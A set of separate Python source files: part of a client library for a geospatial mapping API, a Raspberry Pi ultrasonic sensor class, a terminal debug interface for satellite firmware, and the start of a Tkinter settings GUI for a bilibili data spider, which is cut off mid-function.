for i in np.arange(data.shape[0]):
for c in data.columns:
value = data[c].values[i]
if not np.isnan(value):
if includeDatetime:
values = values + [{'property':c, 'value':data[c].values[i], 'date':dates[i]}]
else:
values = values + [{'property':c, 'value':data[c].values[i]}]
chunks_values = chunks(values)
N = 0
for values_sub in chunks_values:
body = {"mapId": mapId, "values":values_sub, 'layerId':layerId, 'geometryId':geometryId}
r = s.post(url + '/series/add', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
loadingBar(N*3000 + len(values_sub), len(values))
N = N+1
def seriesDelete(shapeId, layerId, geometryId, seriesIds, token, revert = False):
body = {'mapId':shapeId, 'layerId':layerId, 'geometryId':geometryId, 'seriesIds':list(seriesIds), 'revert':revert}
r = s.post(url + '/series/delete', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def seriesChangelog(shapeId, layerId, geometryId, limit = 100, userId = None, pageStart = None, actions = ['add', 'delete', 'revert'], token = None):
changes = []
keepGoing = True
while keepGoing:
pageSize = min(100, limit - len(changes))
body = {'mapId':shapeId, 'layerId':layerId, 'geometryId':geometryId, 'pageSize':pageSize, 'actions':list(actions)}
if str(type(userId)) != str(type(None)):
body['userId'] = userId
if str(type(pageStart)) != str(type(None)):
body['pageStart'] = pageStart
if token ==None:
r = s.post(url + '/series/changelog',
json = body )
else:
r = s.post(url + '/series/changelog', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
pageStart = r['nextPageStart']
r = r['result']
changes = changes + r
if len(changes) >= limit or str(type(pageStart)) == str(type(None)):
break
return(changes)
def seriesInfo(shapeId, layerId, geometryId = None, token = None):
mapId = shapeId
body = {'mapId':mapId, 'layerId':layerId}
if str(type(geometryId)) != str(type(None)):
body['geometryId'] = geometryId
if token ==None:
r = s.post(url + '/series/info',
json = body )
else:
r = s.post(url + '/series/info', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
r['dateMin'] = datetime.strptime(r['dateMin'], "%Y-%m-%d %H:%M:%S")
r['dateMax'] = datetime.strptime(r['dateMax'], "%Y-%m-%d %H:%M:%S")
return(r)
def seriesGet(shapeId, layerId, geometryId, propertyName = None, dateFrom = None, dateTo = None, pageStart = None, userId=None, limit = None, token = None):
mapId = shapeId
body = {'mapId':mapId, 'geometryId':geometryId, 'returnType':'json', 'layerId':layerId}
if str(type(pageStart)) != str(type(None)) and str(type(pageStart)) != str(type(None)):
raise ValueError('cannot define pageStart together with dateTo')
if str(type(dateFrom)) != str(type(None)):
if str(type(dateFrom)) == "<class 'datetime.datetime'>":
dateFrom = dateFrom.strftime('%Y-%m-%d %H:%M:%S')
pageStart = {'dateFrom':dateFrom}
if str(type(userId)) != str(type(None)):
body['userId'] = userId
if str(type(dateTo)) != str(type(None)):
if str(type(dateTo)) == "<class 'datetime.datetime'>":
dateTo = dateTo.strftime('%Y-%m-%d %H:%M:%S')
body['dateTo'] = dateTo
if str(type(propertyName)) != str(type(None)):
body['property'] = propertyName
keepGoing = True
series = []
while keepGoing:
if(str(type(pageStart)) != str(type(None))):
body['pageStart'] = pageStart
if(str(type(limit)) != str(type(None))):
body['limit'] = min(5000, limit - len(series))
if token ==None:
r = s.post(url + '/series/get',
json = body )
else:
r = s.post(url + '/series/get', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
pageStart = r['nextPageStart']
series = series + r['result']
if str(type(limit)) != str(type(None)) and len(series >= limit):
keepGoing = False
if str(type(pageStart)) == str(type(None)):
keepGoing = False
series = [ { 'id':k['id'], 'property': k['property'], 'value': k['value'], 'date': datetime.strptime(k['date'], "%Y-%m-%dT%H:%M:%S.%fZ") } for k in series]
series = pd.DataFrame(series)
return(series)
################################################up and downloads
def addTimestamp(mapId, startDate, token, endDate = None, bounds=None):
if str(type(endDate)) == str(type(None)):
endDate = startDate
if str(type(startDate)) != "<class 'datetime.datetime'>":
raise ValueError('startDate must of of type python date')
if str(type(endDate)) != "<class 'datetime.datetime'>":
raise ValueError('endDate must of of type python date')
startDate = startDate.strftime("%Y-%m-%dT%H:%M:%S.%f")
endDate = endDate.strftime("%Y-%m-%dT%H:%M:%S.%f")
toAdd = {'dateFrom':startDate, 'dateTo':endDate}
if str(type(bounds)) != str(type(None)):
boundary = gpd.GeoSeries([bounds]).__geo_interface__['features'][0]
boundary = boundary['geometry']
toAdd['bounds'] = boundary
body = {"mapId": mapId, "toAdd":[toAdd]}
r = s.post(url + '/settings/projects/reschedule', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()[0]
return({'id':r})
def activateTimestamp(mapId, timestampId, active, token):
toActivate = []
toDeactivate = []
if active:
toActivate = [timestampId]
else:
toDeactivate = [timestampId]
body = {'mapId':mapId, 'toActivate': toActivate, 'toDeactivate': toDeactivate}
r = s.post(url + '/settings/projects/reschedule', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def removeTimestamp(mapId, timestampNumber, token, revert = False, hard = False):
r = s.post(url + '/settings/projects/deleteTimestamp', headers = {"Authorization":token},
json = {"mapId": mapId, "timestamp":timestampNumber, 'revert':revert, 'hard':hard})
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def getGeometryUploads(shapeId, layerId, token):
body = {'mapId':shapeId, 'layerId': layerId}
r = s.post(url + '/files/geometry/getUploads', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
return(r.json())
def uploadRasterFile(mapId, timestampId, file, token, fileFormat = 'tif', epsg = None):
if not os.path.exists(file):
raise ValueError( file + ' not found')
splitsign = os.path.join('s' ,'s')[1]
fileName = file.split(splitsign)[-1]
if not os.path.exists(file):
raise ValueError( file + ' not found')
conn_file = open(file, 'rb')
payload = MultipartEncoder(fields = {'timestampId': timestampId, 'mapId':mapId, 'format':fileFormat, 'fileName':fileName, 'upload': (fileName, conn_file, 'application/octet-stream')})
if str(type(epsg)) != str(type(None)):
payload['epsg'] = epsg
r = s.post(url + '/files/raster/upload', headers = {"Authorization":token, "Content-Type": payload.content_type}, data=payload)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
conn_file.close()
def addShapeLayer(shapeId, layerName, token, color = "#fcba033f"):
mapId = shapeId
r = s.post(url + '/settings/geometryLayers/add', headers = {"Authorization":token},
json = {"mapId": mapId, "color":color, "layerName":layerName, "properties":[] })
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
return(r.json())
def removeShapeLayer(shapeId, layerId, token, revert = False):
mapId = shapeId
r = s.post(url + '/settings/geometryLayers/delete', headers = {"Authorization":token},
json = {"mapId": mapId, "layerId":layerId, "revert": revert })
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def uploadGeometryFile(shapeId, layerId, file, fileFormat, token, epsg=None):
mapId = shapeId
if not os.path.exists(file):
raise ValueError( file + ' not found')
splitsign = os.path.join('s' ,'s')[1]
fileName = file.split(splitsign)[-1]
conn_file = open(file, 'rb')
payload = MultipartEncoder({"mapId": mapId, 'layerId':layerId, 'fileName':fileName, 'format':fileFormat, 'upload': (fileName, conn_file, 'application/octet-stream') } )
if str(type(epsg)) != str(type(None)):
payload['epsg'] = int(epsg)
r = s.post(url + '/files/geometry/upload' , headers = {"Authorization":token, "Content-Type": payload.content_type}, data=payload)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
conn_file.close()
def addProperty(shapeId, layerId, propertyName, propertyType, token, private=False, required=False):
mapId = shapeId
body = {"mapId": mapId, 'layerId':layerId, 'propertyName': propertyName, 'type':propertyType, 'private':private, 'required':required }
r = s.post(url + '/settings/geometryLayers/addProperty', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
return(r.json())
def deleteProperty(shapeId, layerId, propertyName, token, revert = False):
mapId = shapeId
body = {"mapId": mapId, 'layerId':layerId, 'propertyName': propertyName, 'revert':revert }
r = s.post(url + '/settings/geometryLayers/deleteProperty', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def ShapeLayerIndex(shapeId, layerId, token, filterProperties = [], idProperty = None):
if type(filterProperties) != type([]):
raise ValueError('filterProperties must be a list with property names')
toAdd = [ {'property': p, 'id':False } for p in filterProperties]
if str(type(filterProperties)) != str(type(None)):
toAdd = toAdd + [{'property':idProperty, 'id':True}]
body = {"mapId":shapeId,"layerId":layerId, 'properties':toAdd}
r = s.post(url + '/settings/geometryLayers/reIndex', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def shapeLayerAddStyle(shapeId, layerId, styleName, rules, token, isDefault=False):
rules_new = []
for rule in rules:
value = rule['value']
if 'float' in str(type(value)):
value = float(value)
elif 'int' in str(type(value)):
value = int(value)
elif 'str' in str(type(value)):
value = str(value)
elif 'bool' in str(type(value)):
value = bool(value)
else:
raise ValueError('value must be a float, int or string')
rules_new = rules_new + [ {'property': str(rule['property']) , 'value': value , 'operator': str(rule['operator']) , 'color': str(rule['color']) } ]
body = {'mapId':shapeId, 'layerId': layerId, 'rules':rules_new, 'styleName':styleName, 'isDefault':isDefault }
r = s.post(url + '/settings/geometryLayers/addStyle', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r= r.json()
return(r)
def shapeLayerRemoveStyle(shapeId, layerId, styleId, token):
body = {'mapId':shapeId, 'layerId': layerId, 'styleId':styleId}
r = s.post(url + '/settings/geometryLayers/removeStyle', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def mapVisualisationAdd(mapId, name, method , bands, parameters, token):
parameter = json.loads(json.dumps(parameters))
body = {'mapId': mapId, 'name':name, 'method':method, 'bands':list(bands), 'overwrite':False, 'parameters':parameter}
r = s.post(url + '/settings/mapLayers/add', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
return(r.json())
def mapVisualisationRemove(mapId, layerId, token):
body = {'mapId': mapId, 'layerId':layerId}
r = s.post(url + '/settings/mapLayers/delete', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
############################new projects
def newShape(name, token):
r = s.post(url + '/settings/projects/newShape', headers = {"Authorization":token},
json = {"name": name})
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
return(r)
def updateBounds(shapeId, token, boundary):
boundary = gpd.GeoSeries([boundary]).__geo_interface__['features'][0]
boundary = boundary['geometry']
body = {"mapId": shapeId, 'bounds':boundary}
r = s.post(url + '/settings/projects/newBounds', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def newMap(name, token):
body = {'name':name}
r = s.post(url + '/settings/projects/newMap', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
return(r)
def newOrder(name, token, dataSource = 'sentinel2RGBIR' ):
body = {'name':name, 'dataSource':{'name':dataSource}}
r = s.post(url + '/settings/projects/newMap', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
return(r)
def projectProperties(projectId, properties, token):
mapId = projectId
body = {'mapId':mapId, 'properties':properties}
r = s.post(url + '/settings/organize/properties', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def projectAddHashtag(projectId, hashtag, token):
mapId = projectId
body = {'mapId':mapId, 'hashtag':hashtag}
r = s.post(url + '/settings/organize/addHashtag', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def projectRemoveHashtag(projectId, hashtag, token):
mapId = projectId
body = {'mapId':mapId, 'hashtag':hashtag}
r = s.post(url + '/settings/organize/removeHashtag', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def projectDescription(projectId, description, token):
r = s.post(url + '/settings/organize/description', headers = {"Authorization":token},
json = {'mapId':projectId, 'description':description })
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
##################################################################################################################
def plotPolys(polys, xMin = None,xMax = None,yMin=None,yMax= None, alpha = None, image = None, colors = {0:(0,0,255)} , column= None):
polys.crs = {'init': 'epsg:4326'}
if str(type(xMin)) == str(type(None)):
polys_union = polys.unary_union
bbox = gpd.GeoDataFrame({'geometry':[polys_union]})
xMin = bbox.bounds['minx'].values[0]
yMin = bbox.bounds['miny'].values[0]
xMax = bbox.bounds['maxx'].values[0]
yMax = bbox.bounds['maxy'].values[0]
bbox = gpd.GeoDataFrame( {'geometry': [Polygon([(xMin,yMin), (xMax, yMin), (xMax, yMax), (xMin, yMax)])]} )
bbox.crs = {'init': 'epsg:4326'}
bbox = bbox.to_crs({'init': 'epsg:3785'})
polys = polys.to_crs({'init': 'epsg:3785'})
if str(type(image)) == "<class 'NoneType'>":
if (xMax-xMin) > (yMax - yMin):
image = np.zeros((1024,1024* int((xMax-xMin)/(yMax-yMin)),4))
else:
image = np.zeros((1024* int((yMax-yMin)/(xMax-xMin)),1024,4))
image = image/255
if column == None:
column = 'extra'
polys[column] = 0
transform = rasterio.transform.from_bounds(bbox.bounds['minx'], bbox.bounds['miny'], bbox.bounds['maxx'], bbox.bounds['maxy'], image.shape[1], image.shape[0])
rasters = np.zeros(image.shape)
for key in colors.keys():
sub_polys = polys.loc[polys[column] == key]
if sub_polys.shape[0] >0:
raster = rasterize( shapes = [ (sub_polys['geometry'].values[m], 1) for m in np.arange(sub_polys.shape[0]) ] , fill = 0, transform = transform, out_shape = (image.shape[0], image.shape[1]), all_touched = True )
raster = np.stack([raster * colors[key][0]/255, raster*colors[key][1]/255,raster*colors[key][2]/255, raster ], axis = 2)
rasters = np.add(rasters, raster)
rasters = np.clip(rasters, 0,1)
image_out = rasters
image_out[image_out[:,:,3] == 0, :] = image [image_out[:,:,3] == 0, :]
if alpha != None:
image_out = image * (1 - alpha) + image_out*alpha
image_out = image_out *255
image_out = image_out.astype('uint8')
return(image_out)
def chunks(l, n = 3000):
result = list()
for i in range(0, len(l), n):
result.append(l[i:i+n])
return(result)
def cover(bounds, w):
if str(type(bounds)) == "<class 'shapely.geometry.polygon.Polygon'>" :
bounds = [bounds]
elif str(type(bounds)) =="<class 'shapely.geometry.multipolygon.MultiPolygon'>":
bounds = bounds
else:
raise ValueError('bounds must be a shapely polygon or multipolygon')
bound = bounds[0]
coords_total = pd.DataFrame()
for bound in bounds:
x1, y1, x2, y2 = bound.bounds
step_y = w/geodesic((y1,x1), (y1 - 1,x1)).meters
parts_y = math.floor((y2 - y1)/ step_y + 1)
y1_vec = y1 + np.arange(0, parts_y )*step_y
y2_vec = y1 + np.arange(1, parts_y +1 )*step_y
steps_x = [ w/geodesic((y,x1), (y,x1+1)).meters for y in y1_vec ]
parts_x = [math.floor( (x2-x1) /step +1 ) for step in steps_x ]
coords = pd.DataFrame()
for n in np.arange(len(parts_x)):
x1_sq = [ x1 + j*steps_x[n] for j in np.arange(0,parts_x[n]) ]
x2_sq = [ x1 + j*steps_x[n] for j in np.arange(1, parts_x[n]+1) ]
coords_temp = {'x1': x1_sq, 'x2': x2_sq, 'y1': y1_vec[n], 'y2':y2_vec[n]}
coords = coords.append(pd.DataFrame(coords_temp))
coords_total = coords_total.append(coords)
cover = [Polygon([ (coords_total['x1'].iloc[j] , coords_total['y1'].iloc[j]) , (coords_total['x2'].iloc[j] , coords_total['y1'].iloc[j]), (coords_total['x2'].iloc[j] , coords_total['y2'].iloc[j]), (coords_total['x1'].iloc[j] , coords_total['y2'].iloc[j]) ]) for j in np.arange(coords_total.shape[0])]
coords = gpd.GeoDataFrame({'geometry': cover, 'x1':coords_total['x1'], 'x2':coords_total['x2'], 'y1':coords_total['y1'], 'y2':coords_total['y2'] })
coords.crs = {'init': 'epsg:4326'}
return(coords)
def loadingBar(count,total):
if total == 0:
return
else:
percent = float(count)/float(total)*100
sys.stdout.write("\r" + str(int(count)).rjust(3,'0')+"/"+str(int(total)).rjust(3,'0') + ' [' + '='*int(percent) + ' '*(100-int(percent)) + ']')
########################
|
UltrasonikSensor.py
|
import RPi.GPIO as GPIO
from time import sleep, time
from threading import Thread
class UltrasonicSensor:
def __init__(self, echo, trig, setup=GPIO.BOARD):
self.echo = echo
self.trig = trig
self.Time = 0
self.currentValue = 0
GPIO.setmode(setup)
GPIO.setup(self.trig, GPIO.OUT)
GPIO.setup(self.echo, GPIO.IN)
GPIO.output(trig, False)
def startMeasuringDistance(self):
Thread(target=self.__measureDistance__).start()
sleep(0.2)
def readDistance(self):
return self.currentValue
def __measureDistance__(self):
while True:
GPIO.output(self.trig, True)
sleep(0.0001)
GPIO.output(self.trig, False)
signalBeginning = time()
while GPIO.input(self.echo) == 1:
signalEnd = time()
self.Time = signalEnd - signalBeginning
self.currentValue = self.Time * 17150
|
tool_debug_if.py
|
'''
Debugging interface for the OBC firmware.
'''
import argparse
import subprocess
import sys
from threading import Thread
from queue import Queue, Empty
import signal
import re
import time
from pathlib import Path
from blessed import Terminal
# Whether or not we're running on a POSIX system (linux, mac etc.)
ON_POSIX = 'posix' in sys.builtin_module_names
# Regex pattern that splits of ANSI escape sequences
ANSI_ESCAPE = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]')
LOG_LEVEL_MAP = {
'TRC': 'trace',
'DBG': 'debug',
'---': 'info',
'WRN': 'warning',
'ERR': 'error'
}
class GracefulKiller:
kill_now = False
def __init__(self):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self,signum, frame):
self.kill_now = True
class LogLine:
raw_ascii = None
time = None
level = None
file = None
line = None
module = None
message = None
event_code = None
@staticmethod
def parse(line):
log_line = LogLine()
log_line.raw_ascii = line.strip()
# Remove ansi codes
line = ANSI_ESCAPE.sub('', line)
# Split the line on spaces
parts = line.split()
# Parse the pieces of the log line
try:
log_line.time = int(parts[1])
except:
pass
log_line.level = LOG_LEVEL_MAP[parts[2][0:3]]
log_line.file = parts[3].split(':')[0]
log_line.line = parts[3].split(':')[1]
log_line.message = ' '.join(parts[4:-1])
# The module is either the part of the name before the _, or the whole
# name. If the first letter is uppercase that's a module name,
# otherwise it's the whole name.
path = Path(log_line.file)
if path.name[0].isupper():
log_line.module = path.name.split('_')[0]
else:
log_line.module = path.stem
# If the module is eventmanager and the message is 'EVENT: ', mark this
# line as an event and add the code
if log_line.message.startswith('EVENT: '):
log_line.event = log_line.message.replace('EVENT: ', '')
return log_line
def print(self, term, link_num):
# Get the root dir
root_dir = Path(__file__).parent.parent.parent.absolute()
# Replace the file position with a link which opens the file. TODO:
# this doesn't seem to work just yet
print(
self.raw_ascii.replace(
f'{self.file}:{self.line}',
term.link(
f'file://{root_dir}/src/{self.file}',
f'{self.file}:{self.line}',
link_num
)
)
)
class Interface:
run = True
def __init__(self, exec_name):
self.log_lines = []
self.term = Terminal()
self.term.enter_fullscreen()
print(self.term.clear)
self.term.csr(1, self.term.height - 2)
self.log_pos = 0
self.exec_name = exec_name
self.opmode = 0
self.time = 0
self.command = ''
self.num_links = 0
def __del__(self):
self.term.exit_fullscreen()
def update(self):
term = self.term
filtered_lines = list(self.filtered_log_lines())
# Handle key presses
with self.term.cbreak():
key = self.term.inkey(timeout=0)
if not key:
pass
# elif key.name == 'KEY_UP' and self.log_pos > 0:
# self.log_pos -= 1
# self.update_log_lines = True
# elif key.name == 'KEY_DOWN' and self.log_pos < len(filtered_lines):
# self.log_pos += 1
# self.update_log_lines = True
# elif key == 'q':
# self.run = False
else:
self.command += key
# Print exec name
with term.hidden_cursor(), term.location(0, 0):
print(self.exec_name)
# Get string with time and opmode
status_str = f'OPMODE: {self.opmode} TIME: {self.time}'
print(
term.move_xy(term.width - term.length(status_str), 0)
+
status_str
)
# Write command at the bottom
print(term.move_xy(0, term.height - 1) + term.clear_eol + self.command)
def add_log_line(self, log_line):
self.log_lines.append(log_line)
self.time = log_line.time
if self.log_line_filter(log_line) is not None:
log_line.print(self.term, self.num_links)
self.num_links += 1
self.update_log_lines = True
def log_line_filter(self, log_line):
if log_line.event_code:
return log_line
elif log_line.level == 'trace':
return None
else:
return log_line
def filtered_log_lines(self):
return filter(self.log_line_filter, self.log_lines)
def main(executable = None):
'''
Run the main debugging environment.
Parameters:
executable - path to the executable to run, or None to connect to serial
'''
# Branch depending on whether connecting to serial or running exec
if executable is None:
# TODO: serial
print('Serial not yet supported')
else:
run_exec(executable)
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def run_exec(executable):
'''
Run an executable firmware image using subprocess.
'''
process = subprocess.Popen(
executable,
stdout=subprocess.PIPE,
close_fds=ON_POSIX
)
queue = Queue()
thread = Thread(target=enqueue_output, args=(process.stdout, queue))
thread.daemon = True
thread.start()
killer = GracefulKiller()
interface = Interface(executable)
while interface.run:
# Read a line from out in a non-blocking way
try:
line = queue.get_nowait()
except Empty:
# No output
pass
else:
# Decode the line from raw bytes to ascii, also strip any
# newline/whitspace off the line
line_ascii = line.decode('ascii').strip()
# Parse the parts of the line and add it to the interface
interface.add_log_line(LogLine.parse(line_ascii))
# Update the interface
interface.update()
# Delete the interface, which exists full screen
del interface
if __name__ == '__main__':
# Parse arguments
parser = argparse.ArgumentParser(
description='Debuging interface for the OBC firmware.'
)
parser.add_argument(
'executable', metavar='E', type=str, nargs='?',
help='executable to run, or none to connect to serial'
)
args = parser.parse_args()
main(args.executable)
|
spider_gui_mode.pyw
|
# -*- coding: UTF-8 -*-
from bilispider import spider
import os
import sys
import time
import queue
import requests
import threading
import tkinter as tk
import tkinter.ttk as ttk
import tkinter.font as tkFont
import tkinter.messagebox as tkmsgbox
from tkinter.filedialog import askdirectory
class spider_gui_mode(spider,threading.Thread):
def __init__(self,rid,config={}):
threading.Thread.__init__(self,daemon=True)
spider.__init__(self,rid,config)
def set_logger(self,config):
class gui_logger(object):
def __init__(self):
self.log = queue.Queue()
def add_log(self,level,msg):
self.log.put((level,time.time(),msg),block=False)
def debug(self,msg,*args,**kwargs):
self.add_log(1,msg)
def info(self,msg,*args,**kwargs):
self.add_log(2,msg)
def warning(self,msg,*args,**kwargs):
self.add_log(3,msg)
def error(self,msg,*args,**kwargs):
self.add_log(4,msg)
def fatal(self,msg,*args,**kwargs):
self.add_log(5,msg)
self.SHOW_BAR = False
self.QUITE_MODE = False
self._logger = gui_logger()
def run(self):
self.auto_run()
def get_logger(self):
return self._logger.log
def get_status(self):
return self.status
class root_window():
def __init__(self):
pass
def show_window(self):
config = {}
root = tk.Tk()
root.title('设置')
root.resizable(0,0)
show_more_choice = tk.BooleanVar(root,value=0)
get_full_info = tk.BooleanVar(root,value=0)
working_path = tk.StringVar(root,value=os.getcwd())
output_choice = tk.IntVar(root,value=config.get('output',1))
thread_num = tk.IntVar(root,value=config.get('thread_num',2))
http_port = tk.IntVar(root,value=config.get('http',1214))
disable_http = tk.BooleanVar(root,value=0)
#显示基本选项
es_frame = tk.Frame(root)
ttk.Label(es_frame,text="分区id").grid(row=0,sticky=tk.E,padx=0)
ttk.Label(es_frame,text="从url识别").grid(row=1,sticky=tk.E,padx=0)
ttk.Label(es_frame,text="工作目录").grid(row=2,sticky=tk.E,padx=0)
#加载tid输入框
tid_entry = ttk.Combobox(es_frame,width=18)
self.tid_entry = tid_entry
tid_entry.grid(row=0,column=1,sticky=tk.W)
tid_info = self.load_tid_info()
tid_option = tuple(" - ".join(line) for line in filter(lambda line:line[1],tid_info))
tid_entry.config(value=tid_option)
tid_entry.insert(0,config.get('tid',''))
self.tid_entry_focusout()
tid_entry.bind("<FocusOut>",self.tid_entry_focusout)
#tid_entry.bind("<Leave>",tid_entry_focusout)
tid_entry.bind("<KeyRelease>",self.tid_entry_change)
tid_entry.bind("<FocusIn>",self.tid_entry_focusin)
tid_entry.bind("<ButtonRelease-1>",self.tid_entry_focusin)
tid_entry.bind("<Return>",self.tid_entry_onreturn)
#url输入框
url_entry = ttk.Entry(es_frame,width=40)
url_entry.grid(row=1,column=1,columnspan=3,sticky=tk.W)
url_entry.bind("<Return>",self.get_tid)
url_entry.bind("<FocusIn>",self.url_entry_focusin)
#工作目录输入框
ttk.Entry(es_frame,width=30,textvariable=working_path).grid(row=2,column=1,columnspan=2,sticky=tk.W)
#ttk.Button(es_frame,text='确认',width=5,command=get_tid).grid(row=0,column=2,sticky=tk.W)
ttk.Button(es_frame,text='选择',width=5,command=self.selectpath).grid(row=2,column=3,sticky=tk.W)
tid_info_label = ttk.Label(es_frame)
tid_info_label.grid(row=0,column=2,columnspan=2,padx=10,sticky=tk.W)
es_frame.columnconfigure(0,minsize=80)
es_frame.columnconfigure(1,minsize=10)
es_frame.columnconfigure(2,minsize=80)
es_frame.columnconfigure(3,minsize=100)
es_frame.pack()
#高级选项
ad_frame = tk.Frame(root)
#logmode_choice = tk.IntVar(root,value=config.get('logmode',1))
#添加分割线
ttk.Separator(ad_frame,orient=tk.HORIZONTAL).grid(row=0,column=0,columnspan=4,sticky="we",pady=8,padx=0)
#添加标签控件
ttk.Label(ad_frame,text='输出级别').grid(row=1,column=0,padx=(0,10))
ttk.Label(ad_frame,text='线程数').grid(row=3,column=0)
ttk.Label(ad_frame,text='http服务器端口').grid(row=4,column=0,padx=(0,10))
#日志模式单选按钮
logmode_description = ('DEBUG','INFO','ERROR')
for i in range(3):
ttk.Radiobutton(ad_frame,text=logmode_description[i],variable=output_choice,value=i).grid(row=1,column=i+1,stick=tk.W)
#添加线程数滑动条
ttk.Scale(ad_frame, from_=1, to=10,length=150,variable=thread_num,command=self.show_thread_num).grid(row=3,column=1,columnspan=2)
thread_num_label = tk.Label(ad_frame,text='2')
thread_num_label.grid(row=3,column=3)
#添加端口输入框
http_scale = ttk.Scale(ad_frame, from_=1, to=2000,length=150,variable=http_port,command=self.set_port)
http_scale.grid(row=4,column=1,columnspan=2)
ttk.Entry(ad_frame,textvariable=http_port,width=6).grid(row=4,column=3)
#添加复选框
ttk.Checkbutton(ad_frame,text='收集完整信息',variable=get_full_info).grid(row=5,rowspan=3,column=0,padx=(0,10))
ttk.Checkbutton(ad_frame,text='禁用监视',variable=disable_http,command=self.http_switch).grid(row=5,rowspan=2,column=1)
#高级选项结束
buttom_frame = tk.Frame(root)
ttk.Checkbutton(buttom_frame,text='展开高级选项',width=12,command=self.show_more_or_less,variable=show_more_choice).pack(side=tk.RIGHT,fill=tk.X,padx=(10,20))
ttk.Button(buttom_frame,text='退出',width=8,command=sys.exit).pack(side=tk.RIGHT,fill=tk.X,padx=(10,20))
ttk.Button(buttom_frame,text='开始',width=8,command=self.on_start).pack(side=tk.RIGHT,fill=tk.X,padx=(60,20))
buttom_frame.pack(pady=(7,5))
tid_entry.focus_set()
self.root = root
self.config = config
self.working_path = working_path
self.show_more_choice = show_more_choice
self.ad_frame = ad_frame
self.output_choice = output_choice
self.thread_num = thread_num
self.http_port = http_port
# self.tid_entry = tid_entry
self.tid_info_label = tid_info_label
self.url_entry = url_entry
self.es_frame = es_frame
self.thread_num_label = thread_num_label
self.tid_info = tid_info
self.get_full_info = get_full_info
self.http_scale = http_scale
self.disable_http = disable_http
#self.http_port.config(state=tk.DISABLED)
root.mainloop()
def get_tid(self,event):
# if not url_entry.get():
# if tid_entry.get():
# tkmsgbox.showinfo("提醒","已输入分区id,请点击 开始")
# else :
# tkmsgbox.showinfo("错误","请填入视频url或者av号")
# return
self.tid_info_label.config(text = '正在获取')
try:
from bilispider.tools import get_tid_by_url,aid_decode
info = get_tid_by_url(aid_decode(url_entry.get()))
assert len(info[0])<40
tid_entry.delete(0,tk.END)
tid_entry.insert(0," - ".join(info))
tid_info_label.config(text = "获取成功")
except:
self.tid_info_label.config(text = '获取失败')
def show_more_or_less(self):
if self.show_more_choice.get():
self.ad_frame.pack(after=self.es_frame)
else:
self.ad_frame.forget()
def http_switch(self):
if self.disable_http.get():
self.http_scale.config(state=tk.DISABLED)
self.his_http = self.http_port.get()
self.http_port.set(0)
else:
self.http_scale.config(state=tk.NORMAL)
self.http_port.set(getattr(self,'his_http',1214))
def show_thread_num(self,pos):
self.thread_num_label.config(text=str(self.thread_num.get()))
def set_port(self,pos):
self.http_port.set(int(self.http_port.get()))
def selectpath(self):
path = askdirectory(initialdir=self.working_path.get())
if path:
self.working_path.set(path)
def tid_entry_focusout(self,*args,**kwargs):
self.tid_entry.select_clear()
# if tid_entry.get().split("-")[0].strip().isdigit():
# tid = tid_entry.get().split("-")[0].strip()
# info = list(filter(lambda line:line[0]==tid,tid_inf))
# if len(info) == 0:
# return
# elif info[0][1]:
# tid_entry.delete(0,tk.END)
# tid_entry.insert(0," - ".join(info[0]))
def tid_entry_focusin(self,event):
self.tid_info_label.config(text="")
index = len(self.tid_entry.get().split('-')[0].strip())
self.tid_entry.select_range(0,index)
self.tid_entry.icursor(index)
def tid_entry_change(self,event):
tid_entry = self.tid_entry
tid = tid_entry.get().split("-")[0]
if tid.startswith(' '):
tid = tid.lstrip()
tid_entry.delete(0,tk.END)
if not tid == '':
